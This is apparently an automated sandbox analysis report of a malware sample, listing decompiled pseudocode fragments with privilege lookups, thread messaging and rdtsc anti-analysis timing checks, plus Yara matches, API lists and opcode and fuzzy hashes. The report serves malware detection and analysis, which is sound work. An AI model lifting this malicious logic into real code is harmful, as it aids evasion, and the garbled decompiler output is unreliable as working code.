                                                                                                                Function 004182EB, Relevance: 1.5, APIs: 1, Instructions: 19nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 75%
                                                                                                                			E004182EB(void* __ebx, signed int __ecx, intOrPtr _a8, void* _a12) {
				long _t8;
				void* _t13;
				signed int _t17;
				signed int _t18;

				_pop(ss);
				_t18 = _t17 << __ecx;
				 *0x8bec8b55 =  *0x8bec8b55 + __ebx;
				_push(_t18);
				_t5 = _a8;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409743
				E00418DC0(_t13, _a8, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a12); // executed
				return _t8;
			}







                                                                                                                0x004182eb
                                                                                                                0x004182ec
                                                                                                                0x004182ee
                                                                                                                0x004182f0
                                                                                                                0x004182f3
                                                                                                                0x004182f6
                                                                                                                0x004182ff
                                                                                                                0x00418307
                                                                                                                0x00418315
                                                                                                                0x00418319

                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(00413D30,?,?,00413D30,00408AF3,FFFFFFFF), ref: 00418315
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: efbbdeeee5228d91602948ad2d42712c4e4ca017dd9bc3e17e494e5d0110e4be
                                                                                                                • Instruction ID: 6f4eb02e6ae1224d9afe4a88d23c53f01807042d6ada970f8ce4b35750f4294c
                                                                                                                • Opcode Fuzzy Hash: efbbdeeee5228d91602948ad2d42712c4e4ca017dd9bc3e17e494e5d0110e4be
                                                                                                                • Instruction Fuzzy Hash: 47D02B6D50D3C04FC711EBF468D60C27F40DE511187140ECFE49907143D638D1099392
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D98F0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9929570f44b94a5997d94c455cd55dbca2e1f55d96bd6b0debba7ac687f089d6
                                                                                                                • Instruction ID: 445facb986a2f520f51a8d74efbbc4a3b9cb1c1489090bb057fefebd8086fd0b
                                                                                                                • Opcode Fuzzy Hash: 9929570f44b94a5997d94c455cd55dbca2e1f55d96bd6b0debba7ac687f089d6
                                                                                                                • Instruction Fuzzy Hash: 7190026160214502D212715A4404626014A97D03C1FA1C032A5414555ECA658D92F171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 3d03e9ea9d89475e12821bbfedc62d423a9587d05aaa510d4cc6cfd33e0a2d83
                                                                                                                • Instruction ID: 6142828fcdb57620ab813f540c5815817b0339caa671401b538dc9b302161d2b
                                                                                                                • Opcode Fuzzy Hash: 3d03e9ea9d89475e12821bbfedc62d423a9587d05aaa510d4cc6cfd33e0a2d83
                                                                                                                • Instruction Fuzzy Hash: F6900261243181525656B15A44045174146A7E03C17A1C022A5804950C85669C56E661
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: a5c3c5fb83c340264e8a2749d409466b59757b8f865ffd1de783ca5882f8736c
                                                                                                                • Instruction ID: cdab4a80da995d5d55f15801f27728e56c2a04b920f57b73aeaea20eda2c497b
                                                                                                                • Opcode Fuzzy Hash: a5c3c5fb83c340264e8a2749d409466b59757b8f865ffd1de783ca5882f8736c
                                                                                                                • Instruction Fuzzy Hash: BC90027120214413D222615A4504717014997D03C1FA1C422A4814558D96968D52F161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7221d03adcf8fa9275e732511a6bdb18b367290d0653048d4b521d889f35cdb6
                                                                                                                • Instruction ID: 11615873bd16ddf5dda828ff216455686b2802861c940ced4c426d165785dd76
                                                                                                                • Opcode Fuzzy Hash: 7221d03adcf8fa9275e732511a6bdb18b367290d0653048d4b521d889f35cdb6
                                                                                                                • Instruction Fuzzy Hash: AE9002A134214442D211615A4414B160145D7E1381F61C025E5454554D8659CC52B166
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: e46b9ef570646658698910fda7cc89bbcba169f30200da490d514e196f6a162e
                                                                                                                • Instruction ID: b91703a6ea94d2ccbf01ee6136075539854d8a9d004294342047ad70726b1fcc
                                                                                                                • Opcode Fuzzy Hash: e46b9ef570646658698910fda7cc89bbcba169f30200da490d514e196f6a162e
                                                                                                                • Instruction Fuzzy Hash: 889002B120214402D251715A4404756014597D0381F61C021A9454554E86998DD5B6A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9A00, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ae5b56c32101b6a1807ce74ba4d1036b65504555d4642151937106ac2af896b9
                                                                                                                • Instruction ID: 54f554461907a1b40e9c6ea4ef42a979e92d9ae559ddb3623480e5638c7fe3d3
                                                                                                                • Opcode Fuzzy Hash: ae5b56c32101b6a1807ce74ba4d1036b65504555d4642151937106ac2af896b9
                                                                                                                • Instruction Fuzzy Hash: 2190027120254402D211615A481471B014597D0382F61C021A5554555D86658C51B5B1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9A20, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 1cb236c683977411b765c4bbb5d86f8c7745a49528f4d315977312bb2da48bec
                                                                                                                • Instruction ID: 489867252eb4ee21fd2646d54d157d8a7832fc5165213b39e29a78e55b8a34fd
                                                                                                                • Opcode Fuzzy Hash: 1cb236c683977411b765c4bbb5d86f8c7745a49528f4d315977312bb2da48bec
                                                                                                                • Instruction Fuzzy Hash: E8900261602140424251716A88449164145BBE1391761C131A4D88550D85998C65A6A5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 8e2a2f96ad9dbf204974afc5a9852d73caa3e0cb07c5a3b15c059ce96a603fed
                                                                                                                • Instruction ID: 1d1f3b9396c7960c936c81e6448624fb28ee09ee0915e69fc1eafd72231d921f
                                                                                                                • Opcode Fuzzy Hash: 8e2a2f96ad9dbf204974afc5a9852d73caa3e0cb07c5a3b15c059ce96a603fed
                                                                                                                • Instruction Fuzzy Hash: C990026121294042D311656A4C14B17014597D0383F61C125A4544554CC9558C61A561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f3c958d1af671782818f1459c7e96068da3c429b2d8af3a3c2efc5217cb11229
                                                                                                                • Instruction ID: cd6353a9184fd0d4c1909e8806bc8c8d80c7d579205702b3020fbc3cb88a2165
                                                                                                                • Opcode Fuzzy Hash: f3c958d1af671782818f1459c7e96068da3c429b2d8af3a3c2efc5217cb11229
                                                                                                                • Instruction Fuzzy Hash: AA9002A1203140034216715A4414626414A97E0381B61C031E5404590DC5658C91B165
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7494e54c30829b43bce3e5213e9ff2b6ad68b97625febf30887bfc18599e60a1
                                                                                                                • Instruction ID: efa96e69cabf8cc8eaadea2d4bc88709414f1a357f3dbc1151df98fc36b81c83
                                                                                                                • Opcode Fuzzy Hash: 7494e54c30829b43bce3e5213e9ff2b6ad68b97625febf30887bfc18599e60a1
                                                                                                                • Instruction Fuzzy Hash: 0A900265212140030216A55A0704517018697D53D1361C031F5405550CD6618C61A161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4f153f644145002a3d5e6c2e6e74f0c6f1b7399b431631d45856c17bcb576bd5
                                                                                                                • Instruction ID: a4072fa7c2a06fd42aa3f3062966daecf006aeb0f24484ee1ed6bb0ce0ac9139
                                                                                                                • Opcode Fuzzy Hash: 4f153f644145002a3d5e6c2e6e74f0c6f1b7399b431631d45856c17bcb576bd5
                                                                                                                • Instruction Fuzzy Hash: 919002712021C802D221615A840475A014597D0381F65C421A8814658D86D58C91B161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 7769a3ea56028e6486e053ca8246d153c3804086064b1dd26ab4dc4fdb480dc9
                                                                                                                • Instruction ID: 5b1a9d08da96403a859ca00bd18e776093ba46e9de11aa41d6c8f9c4969abc1c
                                                                                                                • Opcode Fuzzy Hash: 7769a3ea56028e6486e053ca8246d153c3804086064b1dd26ab4dc4fdb480dc9
                                                                                                                • Instruction Fuzzy Hash: E690027120214802D291715A440465A014597D1381FA1C025A4415654DCA558E59B7E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ea6bc450975b582a717bc9bfc6265dcb9f5a50ad129d7fdac8c4605127b67233
                                                                                                                • Instruction ID: 45582046fb79f945afbbc8c96c433cb19f9b5dfadc2d0c99dc4049a6e7893d78
                                                                                                                • Opcode Fuzzy Hash: ea6bc450975b582a717bc9bfc6265dcb9f5a50ad129d7fdac8c4605127b67233
                                                                                                                • Instruction Fuzzy Hash: 2690026921314002D291715A540861A014597D1382FA1D425A4405558CC9558C69A361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D97A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 53cd5be38f08f4763cacc72dc117d26068906dbb4cbd5c9129364a294ab5c61a
                                                                                                                • Instruction ID: 360a39a530cc17e891849e0dfed9d03aa3db1ccb777c2c37dbba7641f40c27db
                                                                                                                • Opcode Fuzzy Hash: 53cd5be38f08f4763cacc72dc117d26068906dbb4cbd5c9129364a294ab5c61a
                                                                                                                • Instruction Fuzzy Hash: AF90026130214003D251715A54186164145E7E1381F61D021E4804554CD9558C56A262
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 2c149a4399cfb4aa6807cdb946698615939ac1ab3ca59fd0650d63f470feffcb
                                                                                                                • Instruction ID: 9581703b5f5982d9255041883ba356ec96cab8698b33e7564656b8d485a5ecd3
                                                                                                                • Opcode Fuzzy Hash: 2c149a4399cfb4aa6807cdb946698615939ac1ab3ca59fd0650d63f470feffcb
                                                                                                                • Instruction Fuzzy Hash: 4490027131228402D221615A8404716014597D1381F61C421A4C14558D86D58C91B162
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 009D9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274348250.0000000000970000.00000040.00000001.sdmp, Offset: 00970000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_970000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 3a37d7f4a2bd6e126770f94e87872fbe5b3ff73f4c2452d43913f1094de6450a
                                                                                                                • Instruction ID: 2c0d1962828aec989f00ba7c0cc82937bda5d666fffb33493e94dde5c44c710d
                                                                                                                • Opcode Fuzzy Hash: 3a37d7f4a2bd6e126770f94e87872fbe5b3ff73f4c2452d43913f1094de6450a
                                                                                                                • Instruction Fuzzy Hash: D590027120214402D211659A5408656014597E0381F61D021A9414555EC6A58C91B171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004088B0, Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 93%
                                                                                                                			E004088B0(intOrPtr _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E00(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407010( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E00419CD0( &_v284, 0x104);
						E0041A340( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_t31 = E00413DD0(E00413D70(_t52, _t50),  &_v284);
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407040( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070C0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}



















                                                                                                                0x004088bb
                                                                                                                0x004088c3
                                                                                                                0x004088c5
                                                                                                                0x004088ca
                                                                                                                0x004088cf
                                                                                                                0x004088e2
                                                                                                                0x004088e7
                                                                                                                0x004088f0
                                                                                                                0x004088fc
                                                                                                                0x0040890f
                                                                                                                0x00408914
                                                                                                                0x00408917
                                                                                                                0x00408920
                                                                                                                0x00408932
                                                                                                                0x00408937
                                                                                                                0x0040893c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040893e
                                                                                                                0x00408942
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00408944
                                                                                                                0x00000000
                                                                                                                0x00408942
                                                                                                                0x00408946
                                                                                                                0x00408949
                                                                                                                0x0040894f
                                                                                                                0x00408951
                                                                                                                0x0040895c
                                                                                                                0x00408961
                                                                                                                0x00408964
                                                                                                                0x00408971
                                                                                                                0x0040897c
                                                                                                                0x0040897e
                                                                                                                0x00408984
                                                                                                                0x00408988
                                                                                                                0x0040898b
                                                                                                                0x0040898b
                                                                                                                0x00408992
                                                                                                                0x00408995
                                                                                                                0x0040899a
                                                                                                                0x004089a7
                                                                                                                0x004088d6
                                                                                                                0x004088d6
                                                                                                                0x004088d6

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                • Instruction ID: aa626ceb7ef0a3bcdbf1efb1d9dc2f5a7bb3811b4857f0e914c6161f28eec10c
                                                                                                                • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                • Instruction Fuzzy Hash: FE213AB3D402085BDB10E6649D42BFF73AC9B50304F44057FF989A3182F638BB4987A6
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407260, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 237 407260-4072aa call 419d20 call 41a900 call 409b20 call 413e30 246 4072ac-4072be PostThreadMessageW 237->246 247 4072de-4072e2 237->247 248 4072c0-4072da call 409280 246->248 249 4072dd 246->249 248->249 249->247
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E00419D20( &_v67, 0, 0x3f);
				E0041A900( &_v68, 3);
				_t12 = E00409B20(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E30(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409280(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}












                                                                                                                0x00407260
                                                                                                                0x0040726f
                                                                                                                0x00407273
                                                                                                                0x0040727e
                                                                                                                0x0040728e
                                                                                                                0x0040729e
                                                                                                                0x004072a3
                                                                                                                0x004072aa
                                                                                                                0x004072ad
                                                                                                                0x004072ba
                                                                                                                0x004072bc
                                                                                                                0x004072be
                                                                                                                0x004072db
                                                                                                                0x004072db
                                                                                                                0x00000000
                                                                                                                0x004072dd
                                                                                                                0x004072e2

                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: MessagePostThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 1836367815-0
                                                                                                                • Opcode ID: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                • Instruction ID: bbcd0b2e5740072d15388175686a93538b06234ac68ffc2b081785cbfc84dfa6
                                                                                                                • Opcode Fuzzy Hash: 2611248cf2981be21f72ca7afad4f10f88413beaa9ea5ad5021ab45b4f53d4d7
                                                                                                                • Instruction Fuzzy Hash: 2B01D431A8022876E720A6959C03FFF772C9B00B54F05405EFF04BA1C2E6A87D0682EA
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00418621, Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                Download Yara Rule

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 280 418621-41864a call 418dc0 282 41864f-418664 LookupPrivilegeValueW 280->282
                                                                                                                C-Code - Quality: 62%
                                                                                                                			E00418621(signed int __eax, intOrPtr __ecx, void* __edi, signed int __esi, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t18;
				signed int _t30;

				asm("adc al, bh");
				_t30 = __eax & __esi;
				 *(__edi + 0x6b40b703) =  *(__edi + 0x6b40b703) ^ __esi;
				 *((intOrPtr*)(__esi - 0x74aa7628)) = __ecx;
				_push(_t30);
				_t15 = _a4;
				_push(__esi);
				E00418DC0(__edi, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t15 + 0xa18)), 0, 0x46);
				_t18 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t18;
			}





                                                                                                                0x00418623
                                                                                                                0x00418625
                                                                                                                0x00418626
                                                                                                                0x0041862c
                                                                                                                0x00418630
                                                                                                                0x00418633
                                                                                                                0x0041863c
                                                                                                                0x0041864a
                                                                                                                0x00418660
                                                                                                                0x00418664

                                                                                                                APIs
                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFA2,0040CFA2,00000041,00000000,?,00408B65), ref: 00418660
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000001.00000002.274028278.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_1_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3899507212-0
                                                                                                                • Opcode ID: dc3a13e792b8cd6930beed1dad1d28573739f2e629ecc386193b3d534950f804
                                                                                                                • Instruction ID: 687a530a0da0f1e428c1a346c02b2add9f6048e8dc39be7ac047b9c802d344bb
                                                                                                                • Opcode Fuzzy Hash: dc3a13e792b8cd6930beed1dad1d28573739f2e629ecc386193b3d534950f804
                                                                                                                • Instruction Fuzzy Hash: 81F0EDB1300214AFCB20DF68CC80FD77B68EF88210F05856DF9899B241DA30E811CBE4
                                                                                                                Uniqueness

